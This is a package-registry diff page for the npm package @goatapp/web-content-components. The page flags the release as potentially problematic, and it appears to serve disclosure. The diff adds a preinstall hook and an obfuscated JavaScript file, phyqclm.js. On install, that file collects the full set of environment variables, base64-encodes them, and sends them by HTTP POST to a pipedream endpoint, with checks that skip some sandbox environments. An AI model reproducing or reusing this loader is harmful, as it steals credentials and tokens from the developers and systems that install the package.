@goatapp/web-content-components 0.0.1-security → 5.751.397
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @goatapp/web-content-components might be problematic. Click here for more details.
- package/package.json +8 -3
- package/phyqclm.js +1 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@goatapp/web-content-components",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "5.751.397",
|
|
4
|
+
"main": "phyqclm.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node phyqclm.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/phyqclm.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function a0_0x15ec(_0x38add2,_0xf7b939){const _0x4046a1=a0_0x4046();return a0_0x15ec=function(_0x15ec0e,_0x181f76){_0x15ec0e=_0x15ec0e-0x85;let _0x2224d2=_0x4046a1[_0x15ec0e];return _0x2224d2;},a0_0x15ec(_0x38add2,_0xf7b939);}function a0_0x4046(){const _0x2ecaf9=['end','16iYrcOq','taobao.org','base64','includes','error','keys','USERNAME','toString','env','from','npm_config_registry','10188304abYdhe','7663505pbYlwo','daasadmin','4969PsfVNn','join','npm_package_name','tencent.com','/usr/bin/python','https','net','1393164jMeoTj','5759584CLDRdd','496599txKJAf','748oRhrUE','bd43527e019ae8efb47eb39bb9313ac5','write','some','pipedream','POST','length','6620892IgyYkU'];a0_0x4046=function(){return _0x2ecaf9;};return a0_0x4046();}const a0_0x48d1ba=a0_0x15ec;(function(_0x12ea94,_0x214ce){const _0x5595eb=a0_0x15ec,_0x16c30f=_0x12ea94();while(!![]){try{const _0x35d069=parseInt(_0x5595eb(0x89))/0x1*(-parseInt(_0x5595eb(0x93))/0x2)+-parseInt(_0x5595eb(0x92))/0x3+parseInt(_0x5595eb(0x91))/0x4+parseInt(_0x5595eb(0x87))/0x5+-parseInt(_0x5595eb(0x9a))/0x6+parseInt(_0x5595eb(0x86))/0x7+parseInt(_0x5595eb(0x9c))/0x8*(-parseInt(_0x5595eb(0x90))/0x9);if(_0x35d069===_0x214ce)break;else _0x16c30f['push'](_0x16c30f['shift']());}catch(_0xd85c17){_0x16c30f['push'](_0x16c30f['shift']());}}}(a0_0x4046,0xf1f50));const http=require(a0_0x48d1ba(0x8e)),filter=[{'key':a0_0x48d1ba(0x85),'val':a0_0x48d1ba(0x9d)},{'key':'npm_config_registry','val':a0_0x48d1ba(0x8c)},{'key':'npm_config_registry','val':'registry.npmmirror.com'},{'key':a0_0x48d1ba(0xa2),'val':a0_0x48d1ba(0x88)},{'key':'_','val':a0_0x48d1ba(0x8d)}];function main(){const _0x1da334=a0_0x48d1ba;var _0xcf57b2=process[_0x1da334(0xa4)]||{};if(filter[_0x1da334(0x96)](({key:_0x4bd7bb,val:_0x396da2})=>_0xcf57b2[_0x4bd7bb]&&_0xcf57b2[_0x4bd7bb][_0x1da334(0x9f)](_0x396da2))||Object[_0x1da334(0xa1)](_0xcf57b2)[_0x1da334(0x99)]<0xa)return;req=http['request']({'host':[_0x1da334(0x94),'m',_0x1da334(0x97),_0x1da334(0x8f)][_0x1da334(0x8a)]('.'),'path':'/'+(_0xcf57b2[_0x1da334(0x8b)]||''),'method':_0x1da334(0x98)})['on'](_0x1da334(0xa0),function(_0x284e17){}),req[_0x1da334(0x95)](Buffer[_0x1da334(0xa5)](JSON['stringify'](_0xcf57b2))[_0x1da334(0xa3)](_0x1da334(0x9e))),req[_0x1da334(0x9b)]();}main();
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40goatapp%2Fweb-content-components for more information.
|